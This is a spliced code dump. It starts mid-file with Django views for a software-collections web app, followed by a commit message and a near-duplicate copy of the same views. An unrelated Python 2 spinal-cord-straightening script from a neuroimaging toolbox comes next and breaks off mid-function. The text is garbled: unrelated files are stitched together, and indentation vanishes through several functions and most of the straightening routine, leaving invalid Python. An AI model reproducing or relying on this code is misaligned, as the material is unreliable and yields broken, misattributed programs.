    owner = get_object_or_404(User, **{User.USERNAME_FIELD: username})
    return _list(request, 'scls/list_user.html',
                 owner.softwarecollection_set, {'user': owner}, **kwargs)
def list_tag(request, name, **kwargs):
    """Show the collections carrying the tag *name*.

    An unknown tag renders an empty listing (with an unsaved Tag instance
    in the context) rather than a 404.
    """
    try:
        tag = Tag.objects.get(name=name)
    except Tag.DoesNotExist:
        # BUG FIX: was a bare ``except:`` which also swallowed unrelated
        # failures (database errors, MultipleObjectsReturned, even
        # KeyboardInterrupt); only a missing tag is expected here.
        tag = Tag()
        tag.name = name
    queryset = SoftwareCollection.tagged.with_all(tag)
    dictionary = {'tag': tag}
    return _list(request, 'scls/list_tag.html', queryset, dictionary, **kwargs)
class Detail(DetailView):
    """Read-only page for a single SoftwareCollection (context name 'scl')."""
    context_object_name = 'scl'
    model = SoftwareCollection

detail = Detail.as_view()
class New(CreateView):
    """Create a SoftwareCollection; requires login, and the requesting user
    becomes the maintainer."""
    model = SoftwareCollection
    template_name_suffix = '_new'

    def get_form_class(self):
        return CreateForm

    def form_valid(self, form):
        """
        If the form is valid, save the associated model.
        """
        self.object = form.save(commit=False)
        self.object.maintainer = self.request.user
        self.object.save()
        # NOTE(review): super().form_valid() re-saves self.object via the
        # ModelFormMixin path -- presumably harmless, but verify.
        return super(New, self).form_valid(form)

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        # BUG FIX: was ``super(ProtectedView, self)`` -- ProtectedView is not
        # defined anywhere, so every request raised
        # NameError: global name 'ProtectedView' is not defined.
        return super(New, self).dispatch(*args, **kwargs)

new = New.as_view()
class Edit(UpdateView):
    """Update a SoftwareCollection; only users holding the 'edit'
    permission on the object may load it."""
    model = SoftwareCollection
    template_name_suffix = '_edit'

    def get_form_class(self):
        return UpdateForm

    def get_object(self, *args, **kwargs):
        scl = super(Edit, self).get_object(*args, **kwargs)
        if not scl.has_perm(self.request.user, 'edit'):
            raise PermissionDenied()
        return scl

edit = Edit.as_view()
Use the correct class name in New.dispatch's super() call.

Addresses traceback:
    NameError: global name 'ProtectedView' is not defined
from django.conf import settings
from django.http.response import Http404
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, DetailView, UpdateView
from .models import SoftwareCollection
from .forms import CreateForm, UpdateForm
from django.template import RequestContext
from tagging.models import Tag
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
def _list(request, template, queryset, dictionary, **kwargs):
    """Render *template* with the filtered collections added to the context
    as ``collections``."""
    # TODO add filtering
    filters = {}
    dictionary['collections'] = queryset.filter(**filters)
    return render_to_response(template, dictionary,
                              context_instance=RequestContext(request))
def list_all(request, **kwargs):
    """List every software collection."""
    return _list(request, 'scls/list_all.html',
                 SoftwareCollection.objects, {}, **kwargs)
@login_required
def list_my(request, **kwargs):
    """List the collections belonging to the logged-in user."""
    return _list(request, 'scls/list_my.html',
                 request.user.softwarecollection_set, {}, **kwargs)
def list_user(request, username, **kwargs):
    """List the collections of the given user; 404 when no such user."""
    User = get_user_model()
    owner = get_object_or_404(User, **{User.USERNAME_FIELD: username})
    return _list(request, 'scls/list_user.html',
                 owner.softwarecollection_set, {'user': owner}, **kwargs)
def list_tag(request, name, **kwargs):
    """List the collections tagged *name*.

    An unknown tag renders an empty listing (with an unsaved Tag instance
    in the context) rather than a 404.
    """
    try:
        tag = Tag.objects.get(name=name)
    except Tag.DoesNotExist:
        # BUG FIX: was a bare ``except:`` which also swallowed unrelated
        # failures (database errors, MultipleObjectsReturned, even
        # KeyboardInterrupt); only a missing tag is expected here.
        tag = Tag()
        tag.name = name
    queryset = SoftwareCollection.tagged.with_all(tag)
    dictionary = {'tag': tag}
    return _list(request, 'scls/list_tag.html', queryset, dictionary, **kwargs)
class Detail(DetailView):
    """Read-only page for one SoftwareCollection (context name 'scl')."""
    context_object_name = 'scl'
    model = SoftwareCollection

detail = Detail.as_view()
class New(CreateView):
    """Create a SoftwareCollection; requires login, and the requesting user
    becomes the maintainer."""
    model = SoftwareCollection
    template_name_suffix = '_new'

    def get_form_class(self):
        return CreateForm

    def form_valid(self, form):
        """
        If the form is valid, save the associated model.
        """
        # Save manually so the maintainer is attached before the object
        # hits the database, then let CreateView finish (redirect, etc.).
        scl = form.save(commit=False)
        scl.maintainer = self.request.user
        scl.save()
        self.object = scl
        return super(New, self).form_valid(form)

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(New, self).dispatch(*args, **kwargs)

new = New.as_view()
class Edit(UpdateView):
    """Update a SoftwareCollection; restricted to users with the 'edit'
    permission on the object."""
    model = SoftwareCollection
    template_name_suffix = '_edit'

    def get_form_class(self):
        return UpdateForm

    def get_object(self, *args, **kwargs):
        scl = super(Edit, self).get_object(*args, **kwargs)
        if not scl.has_perm(self.request.user, 'edit'):
            raise PermissionDenied()
        return scl

edit = Edit.as_view()
|
#!/usr/bin/env python
#
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-09-01
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
from msct_parser import Parser
from sct_label_utils import ProcessLabels
from sct_crop_image import ImageCropper
from nibabel import load, Nifti1Image, save
from numpy import array, asarray, append, insert, linalg, mean, sum, isnan
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
from sct_apply_transfo import Transform
import sct_utils as sct
from msct_smooth import smoothing_window, evaluate_derivative_3D
from sct_orientation import set_orientation
from msct_types import Coordinate
import copy_reg
import types
def _pickle_method(method):
    """Reduce a bound method for pickling (needed by multiprocessing.Pool).

    Author: Steven Bethard (author of argparse)
    http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
    """
    name = method.im_func.__name__
    target = method.im_self
    owner = method.im_class
    # Private methods are stored under their name-mangled attribute name,
    # so rebuild the mangling before handing the name to the unpickler.
    mangled_prefix = ''
    if name.startswith('__') and not name.endswith('__'):
        mangled_prefix = owner.__name__.lstrip('_')
    if mangled_prefix:
        name = '_' + mangled_prefix + name
    return _unpickle_method, (name, target, owner)
def _unpickle_method(func_name, obj, cls):
"""
Author: Steven Bethard
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
# Teach pickle how to (de)serialize bound methods so multiprocessing.Pool
# can ship instance methods to worker processes (copy_reg is the Python 2
# spelling of copyreg).
copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
def smooth_centerline(fname_centerline, algo_fitting='hanning', type_window='hanning', window_length=80, verbose=0):
    """Fit a smooth curve through a binary centerline/segmentation volume.

    :param fname_centerline: centerline (or segmentation) image in RPI orientation
    :param algo_fitting: 'hanning' (sliding-window smoothing) or 'nurbs' (b-spline fit)
    :param type_window: window shape for the 'hanning' algorithm (see msct_smooth)
    :param window_length: window length, divided by pz to obtain voxels
    :param verbose: verbosity level forwarded to sct.printv
    :return: x_fit, y_fit, z_fit, x_deriv, y_deriv, z_deriv
    """
    sct.printv('\nSmooth centerline/segmentation...', verbose)
    # get dimensions (again!)
    nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline)
    # open centerline image (renamed from 'file', which shadowed the builtin)
    im_centerline = load(fname_centerline)
    data = im_centerline.get_data()
    # loop across z and associate x,y coordinate with the point having maximum intensity
    # N.B. len(z_centerline) = nz_nonz can be smaller than nz in case the centerline is smaller than the input volume
    z_centerline = [iz for iz in range(0, nz, 1) if data[:, :, iz].any()]
    nz_nonz = len(z_centerline)
    x_centerline = [0 for iz in range(0, nz_nonz, 1)]
    y_centerline = [0 for iz in range(0, nz_nonz, 1)]
    # pre-initialize the derivatives so the final return statement stays
    # well-defined even if an unknown algo_fitting slips past the error branch
    x_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
    y_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
    z_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
    # get center of mass of the centerline/segmentation
    sct.printv('.. Get center of mass of the centerline/segmentation...', verbose)
    for iz in range(0, nz_nonz, 1):
        x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(array(data[:, :, z_centerline[iz]]))
    sct.printv('.. Smoothing algo = '+algo_fitting, verbose)
    if algo_fitting == 'hanning':
        # 2D smoothing
        sct.printv('.. Windows length = '+str(window_length), verbose)
        # change to array
        x_centerline = asarray(x_centerline)
        y_centerline = asarray(y_centerline)
        # Smooth the curve
        x_centerline_smooth = smoothing_window(x_centerline, window_len=window_length/pz, window=type_window, verbose=verbose)
        y_centerline_smooth = smoothing_window(y_centerline, window_len=window_length/pz, window=type_window, verbose=verbose)
        # convert to list final result
        x_centerline_smooth = x_centerline_smooth.tolist()
        y_centerline_smooth = y_centerline_smooth.tolist()
        # clear variable
        del data
        x_centerline_fit = x_centerline_smooth
        y_centerline_fit = y_centerline_smooth
        z_centerline_fit = z_centerline
        # get derivative
        x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = evaluate_derivative_3D(x_centerline_fit, y_centerline_fit, z_centerline, px, py, pz)
        x_centerline_fit = asarray(x_centerline_fit)
        y_centerline_fit = asarray(y_centerline_fit)
        z_centerline_fit = asarray(z_centerline_fit)
    elif algo_fitting == 'nurbs':
        from msct_smooth import b_spline_nurbs
        x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_nurbs(x_centerline, y_centerline, z_centerline, nbControl=None, verbose=verbose)
    else:
        # sct.printv with 'error' is expected to abort the process.
        # NOTE(review): if it ever returns, the *_fit variables are undefined
        # on this path and the return below would raise NameError -- confirm.
        sct.printv('ERROR: wrong algorithm for fitting', 1, 'error')
    return x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
class SpinalCordStraightener(object):
    def __init__(self, input_filename, centerline_filename, debug=0, deg_poly=10, gapxy=20, gapz=15, padding=30, interpolation_warp='spline', rm_tmp_files=1, verbose=1, algo_fitting='hanning', type_window='hanning', window_length=50, crop=1, output_filename=''):
        """Store the straightening parameters; no work happens until straighten().

        :param input_filename: anatomical image to straighten
        :param centerline_filename: centerline or segmentation of the spinal cord
        :param debug: 1 switches straighten() to hard-coded debug inputs
        :param deg_poly: max polynomial degree for centerline fitting
        :param gapxy: half-size (voxels) of the landmark cross in x/y
        :param gapz: gap (voxels) between landmark crosses along z
        :param padding: padding (voxels) applied around the input volume
        :param interpolation_warp: final interpolation method for the warp
        :param rm_tmp_files: 1 to delete the temporary working folder
        :param verbose: 0 silent, 1 text, 2 text + figures
        :param algo_fitting: 'hanning' or 'nurbs'
        :param type_window: window shape for the 'hanning' fitting
        :param window_length: smoothing window length
        :param crop: 1 to crop the straight-label volume to its bounding box
        :param output_filename: output image name ('' means auto-derived)
        """
        self.input_filename = input_filename
        self.centerline_filename = centerline_filename
        self.output_filename = output_filename
        self.debug = debug
        self.deg_poly = deg_poly  # maximum degree of polynomial function for fitting centerline.
        self.gapxy = gapxy  # size of cross in x and y direction for the landmarks
        self.gapz = gapz  # gap between landmarks along z voxels
        self.padding = padding  # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
        self.interpolation_warp = interpolation_warp
        self.remove_temp_files = rm_tmp_files  # remove temporary files
        self.verbose = verbose
        self.algo_fitting = algo_fitting  # 'hanning' or 'nurbs'
        self.type_window = type_window  # !! for more choices, edit msct_smooth. Possibilities: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
        self.window_length = window_length
        self.crop = crop
        # number of worker processes for landmark computation; None lets
        # multiprocessing.Pool pick, 0 disables the pool (serial path)
        self.cpu_number = None
        # parameters passed verbatim to the isct_ANTS* b-spline tools
        self.bspline_meshsize = '5x5x10'
        self.bspline_numberOfLevels = '3'
        self.bspline_order = '2'
        # constraint string for the python rigid landmark registration
        self.algo_landmark_rigid = 'translation-xy'
        # 1: also create single landmarks between crosses
        self.all_labels = 1
        self.use_continuous_labels = 1
        # straightening accuracy metrics, filled in by straighten()
        self.mse_straightening = 0.0
        self.max_distance_straightening = 0.0
    def worker_landmarks_curved(self, arguments):
        """Compute the curved-centerline landmark(s) for one slice index.

        :param arguments: tuple (iz, shared) where shared is
            (iz_curved, x_deriv, y_deriv, z_deriv, x_fit, y_fit, z_centerline).
        :return: (iz, list of Coordinate) -- a 5-point cross when iz is one of
            the cross slices, otherwise a single centerline point when
            self.all_labels >= 1 (possibly an empty list).  Returns None when
            interrupted so the pool can unwind.
        """
        try:
            iz = arguments[0]
            iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline = arguments[1]
            temp_results = []
            if iz in iz_curved:
                # calculate d (ax+by+cz+d=0)
                # (a, b, c) is the centerline tangent at iz, so this plane is
                # orthogonal to the centerline at that point
                a = x_centerline_deriv[iz]
                b = y_centerline_deriv[iz]
                c = z_centerline_deriv[iz]
                x = x_centerline_fit[iz]
                y = y_centerline_fit[iz]
                z = z_centerline[iz]
                d = -(a * x + b * y + c * z)
                # print a,b,c,d,x,y,z
                # set coordinates for landmark at the center of the cross
                coord = Coordinate([0, 0, 0, 0])
                coord.x, coord.y, coord.z = x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz]
                temp_results.append(coord)
                # set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
                cross_coordinates = [Coordinate(), Coordinate(), Coordinate(), Coordinate()]
                cross_coordinates[0].y = y_centerline_fit[iz]
                cross_coordinates[1].y = y_centerline_fit[iz]
                # set x and z coordinates for landmarks +x and -x, forcing the landmark to be in the orthogonal plane and the distance landmark/curve to be gapxy
                # NOTE(review): the unpacking below assumes sympy's solve()
                # returns exactly two real roots in ascending order (root[0]
                # -> index 1 i.e. -x, root[1] -> index 0 i.e. +x) -- confirm.
                # It also assumes c is a (numpy) float, so -1 / c is a true
                # division even on Python 2 -- confirm.
                x_n = Symbol('x_n')
                cross_coordinates[1].x, cross_coordinates[0].x = solve(
                    (x_n - x) ** 2 + ((-1 / c) * (a * x_n + b * y + d) - z) ** 2 - self.gapxy ** 2, x_n)  # x for -x and +x
                cross_coordinates[0].z = (-1 / c) * (a * cross_coordinates[0].x + b * y + d)  # z for +x
                cross_coordinates[1].z = (-1 / c) * (a * cross_coordinates[1].x + b * y + d)  # z for -x
                # set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
                cross_coordinates[2].x = x_centerline_fit[iz]
                cross_coordinates[3].x = x_centerline_fit[iz]
                # set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
                y_n = Symbol('y_n')
                cross_coordinates[3].y, cross_coordinates[2].y = solve(
                    (y_n - y) ** 2 + ((-1 / c) * (a * x + b * y_n + d) - z) ** 2 - self.gapxy ** 2, y_n)  # y for -y and +y
                cross_coordinates[2].z = (-1 / c) * (a * x + b * cross_coordinates[2].y + d)  # z for +y
                cross_coordinates[3].z = (-1 / c) * (a * x + b * cross_coordinates[3].y + d)  # z for -y
                for coord in cross_coordinates:
                    temp_results.append(coord)
            else:
                if self.all_labels >= 1:
                    temp_results.append(
                        Coordinate([x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz], 0], mode='continuous'))
            return iz, temp_results
        except KeyboardInterrupt:
            # Returning None (instead of re-raising) lets the parent pool
            # detect the abort without a traceback from each worker.
            return
def worker_landmarks_curved_results(self, results):
sorted(results, key=lambda l: l[0])
self.results_landmarks_curved = []
landmark_curved_value = 0
for iz, l_curved in results:
for landmark in l_curved:
landmark.value = landmark_curved_value
self.results_landmarks_curved.append(landmark)
landmark_curved_value += 1
def straighten(self):
# Initialization
fname_anat = self.input_filename
fname_centerline = self.centerline_filename
fname_output = self.output_filename
gapxy = self.gapxy
gapz = self.gapz
padding = self.padding
remove_temp_files = self.remove_temp_files
verbose = self.verbose
interpolation_warp = self.interpolation_warp
algo_fitting = self.algo_fitting
window_length = self.window_length
type_window = self.type_window
crop = self.crop
# start timer
start_time = time.time()
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
sct.printv(path_sct, verbose)
if self.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
fname_anat = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/anat_rpi.nii' #path_sct+'/testing/sct_testing_data/data/t2/t2.nii.gz'
fname_centerline = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/centerline_rpi.nii' # path_sct+'/testing/sct_testing_data/data/t2/t2_seg.nii.gz'
remove_temp_files = 0
type_window = 'hanning'
verbose = 2
# check existence of input files
sct.check_file_exist(fname_anat, verbose)
sct.check_file_exist(fname_centerline, verbose)
# Display arguments
sct.printv('\nCheck input arguments...', verbose)
sct.printv(' Input volume ...................... '+fname_anat, verbose)
sct.printv(' Centerline ........................ '+fname_centerline, verbose)
sct.printv(' Final interpolation ............... '+interpolation_warp, verbose)
sct.printv(' Verbose ........................... '+str(verbose), verbose)
sct.printv('', verbose)
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp, verbose)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp, verbose)
sct.run('cp '+fname_centerline+' '+path_tmp, verbose)
# go to tmp folder
os.chdir(path_tmp)
try:
# Change orientation of the input centerline into RPI
sct.printv('\nOrient centerline to RPI orientation...', verbose)
fname_centerline_orient = file_centerline+'_rpi.nii.gz'
set_orientation(file_centerline+ext_centerline, 'RPI', fname_centerline_orient)
# Get dimension
sct.printv('\nGet dimensions...', verbose)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
sct.printv('.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz), verbose)
sct.printv('.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm', verbose)
# smooth centerline
x_centerline_fit, y_centerline_fit, z_centerline, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = smooth_centerline(fname_centerline_orient, algo_fitting=algo_fitting, type_window=type_window, window_length=window_length,verbose=verbose)
# Get coordinates of landmarks along curved centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along curved centerline...', verbose)
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy. In voxel space!!!
# find z indices along centerline given a specific gap: iz_curved
nz_nonz = len(z_centerline)
nb_landmark = int(round(float(nz_nonz)/gapz))
if nb_landmark == 0:
nb_landmark = 1
if nb_landmark == 1:
iz_curved = [0]
else:
iz_curved = [i*gapz for i in range(0, nb_landmark - 1)]
iz_curved.append(nz_nonz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
# landmark_curved initialisation
# landmark_curved = [ [ [ 0 for i in range(0, 3)] for i in range(0, 5) ] for i in iz_curved ]
landmark_curved = []
### TODO: THIS PART IS SLOW AND CAN BE MADE FASTER
### >>=====================================================================================================
worker_arguments = (iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline)
if self.cpu_number != 0:
from multiprocessing import Pool
arguments_landmarks = [(iz, worker_arguments) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
pool = Pool(processes=self.cpu_number)
pool.map_async(self.worker_landmarks_curved, arguments_landmarks, callback=self.worker_landmarks_curved_results)
pool.close()
try:
pool.join() # waiting for all the jobs to be done
if self.results_landmarks_curved:
landmark_curved = self.results_landmarks_curved
else:
raise ValueError('ERROR: no curved landmarks constructed...')
except KeyboardInterrupt:
print "\nWarning: Caught KeyboardInterrupt, terminating workers"
pool.terminate()
sys.exit(2)
except Exception as e:
print 'Error during straightening on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
sys.exit(2)
else:
landmark_curved_temp = [self.worker_landmarks_curved((iz, worker_arguments)) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
landmark_curved_value = 0
for iz, l_curved in landmark_curved_temp:
for landmark in l_curved:
landmark.value = landmark_curved_value
landmark_curved.append(landmark)
landmark_curved_value += 1
# Get coordinates of landmarks along straight centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along straight centerline...', verbose)
# landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
landmark_straight = []
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
# TODO: DO NOT APPROXIMATE CURVE --> LINE
if nb_landmark == 1:
iz_straight = [0 for i in range(0, nb_landmark+1)]
else:
iz_straight = [0 for i in range(0, nb_landmark)]
# print iz_straight,len(iz_straight)
iz_straight[0] = iz_curved[0]
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
z_centerline[iz_curved[index]] - z_centerline[iz_curved[index-1]] ]
# compute norm of this vector
norm_vector_centerline = linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline, 0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
landmark_curved_value = 1
for iz in range(min(iz_curved), max(iz_curved)+1, 1):
if iz in iz_curved:
index = iz_curved.index(iz)
# set coordinates for landmark at the center of the cross
landmark_straight.append(Coordinate([x0, y0, iz_straight[index], landmark_curved_value]))
# set x, y and z coordinates for landmarks +x
landmark_straight.append(Coordinate([x0 + gapxy, y0, iz_straight[index], landmark_curved_value+1]))
# set x, y and z coordinates for landmarks -x
landmark_straight.append(Coordinate([x0 - gapxy, y0, iz_straight[index], landmark_curved_value+2]))
# set x, y and z coordinates for landmarks +y
landmark_straight.append(Coordinate([x0, y0 + gapxy, iz_straight[index], landmark_curved_value+3]))
# set x, y and z coordinates for landmarks -y
landmark_straight.append(Coordinate([x0, y0 - gapxy, iz_straight[index], landmark_curved_value+4]))
landmark_curved_value += 5
else:
if self.all_labels >= 1:
landmark_straight.append(Coordinate([x0, y0, iz, landmark_curved_value]))
landmark_curved_value += 1
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
#sct.run('fslview ' + fname_centerline_orient)
sct.printv('\nPad input volume to account for landmarks that fall outside the FOV...', verbose)
sct.run('isct_c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz', verbose)
# Open padded centerline for reading
sct.printv('\nOpen padded centerline for reading...', verbose)
file = load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
landmark_curved_rigid = []
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
# Reorganize landmarks
points_fixed, points_moving = [], []
for coord in landmark_straight:
points_fixed.append([coord.x, coord.y, coord.z])
for coord in landmark_curved:
points_moving.append([coord.x, coord.y, coord.z])
# Register curved landmarks on straight landmarks based on python implementation
sct.printv('\nComputing rigid transformation (algo='+self.algo_landmark_rigid+') ...', verbose)
import msct_register_landmarks
(rotation_matrix, translation_array, points_moving_reg) = msct_register_landmarks.getRigidTransformFromLandmarks(
points_fixed, points_moving, constraints=self.algo_landmark_rigid, show=False)
# reorganize registered pointsx
for index_curved, ind in enumerate(range(0, len(points_moving_reg), 1)):
coord = Coordinate()
coord.x, coord.y, coord.z, coord.value = points_moving_reg[ind][0], points_moving_reg[ind][1], points_moving_reg[ind][2], index_curved+1
landmark_curved_rigid.append(coord)
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_curved_rigid_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved_rigid)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved_rigid[index].x)), \
int(round(landmark_curved_rigid[index].y)), \
int(round(landmark_curved_rigid[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_rigid_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved_rigid[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_rigid_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved_rigid.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved_rigid.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# writing rigid transformation file
text_file = open("tmp.curve2straight_rigid.txt", "w")
text_file.write("#Insight Transform File V1.0\n")
text_file.write("#Transform 0\n")
text_file.write("Transform: AffineTransform_double_3_3\n")
text_file.write("Parameters: %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f\n" % (
rotation_matrix[0, 0], rotation_matrix[0, 1], rotation_matrix[0, 2], rotation_matrix[1, 0],
rotation_matrix[1, 1], rotation_matrix[1, 2], rotation_matrix[2, 0], rotation_matrix[2, 1],
rotation_matrix[2, 2], -translation_array[0, 0], translation_array[0, 1],
-translation_array[0, 2]))
text_file.write("FixedParameters: 0 0 0\n")
text_file.close()
else:
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# Estimate deformation field by pairing landmarks
#==========================================================================================
# convert landmarks to INT
sct.printv('\nConvert landmarks to INT...', verbose)
sct.run('isct_c3d tmp.landmarks_straight.nii.gz -type int -o tmp.landmarks_straight.nii.gz', verbose)
sct.run('isct_c3d tmp.landmarks_curved.nii.gz -type int -o tmp.landmarks_curved.nii.gz', verbose)
# This stands to avoid overlapping between landmarks
# TODO: do symmetric removal
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 1...', verbose)
label_process_straight = ProcessLabels(fname_label="tmp.landmarks_straight.nii.gz",
fname_output=["tmp.landmarks_straight.nii.gz", "tmp.landmarks_curved.nii.gz"],
fname_ref="tmp.landmarks_curved.nii.gz", verbose=verbose)
label_process_straight.process('remove-symm')
# Estimate rigid transformation
sct.printv('\nEstimate rigid transformation between paired landmarks...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt', verbose)
# Apply rigid transformation
sct.printv('\nApply rigid transformation to curved landmarks...', verbose)
